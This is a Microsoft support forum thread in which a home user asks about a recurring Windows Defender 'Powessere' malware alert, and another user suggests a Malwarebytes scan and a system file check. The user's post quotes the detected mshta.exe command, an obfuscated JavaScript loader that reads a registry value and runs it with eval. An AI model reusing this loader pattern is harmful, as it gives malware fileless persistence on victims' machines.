Good deal! Glad it helped.
Potential malware notice.
![](data:image/svg+xml, %3Csvg xmlns='http://www.w3.org/2000/svg' height='64' class='font-weight-bold' style='font: 600 30.11764705882353px "SegoeUI", Arial' width='64'%3E%3Ccircle fill='hsl(128, 8%, 22%)' cx='32' cy='32' r='32' /%3E%3Ctext x='50%25' y='55%25' dominant-baseline='middle' text-anchor='middle' fill='%23FFF' %3EA%3C/text%3E%3C/svg%3E)
Anonymous
Whenever I start up my computer, I keep receiving a notification that Windows Defender has stopped and deleted a potential threat of malware (Powessere H) on my system. The details of the notification are:
CMDLine: \Device\HarddiskVolume3\Windows\System32\mshta.exe
"C"\WINDOWS\system32\mshta.exe" "javascript:HrKMx5aM="A";V4K=new
ActiveXObject("WScript.Shell"); HH1uWE="e7Y";U9epk3=V4K.RegRead("HKCU\software\g
kmprh\reggfbqsre");DiZNFD64J="QwiXg";eval(U9epk3);opE9Db="7PeVNdi";"
I have run various malware programs trying to get rid of this, but it continues to be blocked every time I start or restart up my desktop unit. I am making the assumption that this needs to be permanently removed, is that correct?
I am at a loss and do not know what to do next. Do I reinstall Windows 10? If I do, will have to reinstall all of my software and my files?
I would greatly appreciate any suggestions/help you can give me.
LF
Windows for home | Windows 10 | Security and privacy
Locked Question. This question was migrated from the Microsoft Support Community. You can vote on whether it's helpful, but you can't add comments or replies or follow the question.
5 answers
Sort by: Most helpful
-
Anonymous
2018-04-20T19:41:31+00:00 -
Anonymous
2018-04-20T19:31:45+00:00 Good news! I am no longer getting the notification that Window Defender has found malware.
I can't thank you enough for guiding me. I have purchased 2 other programs that were supposed to take care of it, but I was still getting the notice. I'm getting ready to purchase the full Malwarebytes program and remove the other 2 programs.
Thanks again.
LF
-
Anonymous
2018-04-20T19:25:23+00:00 LKFisher,
No problem! Good thing your installation is not corrupted, that is a good sign. Keep me posted.
-
Anonymous
2018-04-20T19:22:45+00:00 Ethan:
Okay, I ran as administrator the sfc /scannow. It came back with "Window Resource Protection did not find any integrity violations."
I have downloaded and run the "trial" version of Malwarebytes. It found 655 potential threats which it has quarantined. What I don't understand since I have been having this issue, I have purchased other "malware" programs: WinZip and Tweak Bit. Some of the quarantined items found by Malwarebytes were embedded in files in those programs? Any rate. I am taking a look at purchasing the Malwarebytes program.
I will let you know how things proceed. Thanks again for the help.
LF
-
Anonymous
2018-04-20T17:48:22+00:00 Hi LF,
Before you consider reinstalling Windows, try Malwarebytes and perform a scan: https://www.malwarebytes.com/mwb-download/thank...
Windows Defender is good, but Malwarebytes will provide a more thorough scan. Perform a Quick or Full (longer) Scan and see what the results get you.
Also, malware can wreak havoc on your Windows installation. Open up an administrator Command Prompt session (Start, look for CMD and right click the Command Prompt icon, and Run as administrator). Run, without quotes, "sfc /scannow" to check for corruption. Just for good measure.
If you decide to reinstall Windows 10, you will have to backup important files like documents, pictures, and music to a flash drive (maybe like 16 GB or preferably larger or something), and another 8 GB or larger flash drive to prepare as Windows 10 installation media with the Media Creation, as shown here: https://www.microsoft.com/en-us/software-downlo...
Best of luck. Keep me posted.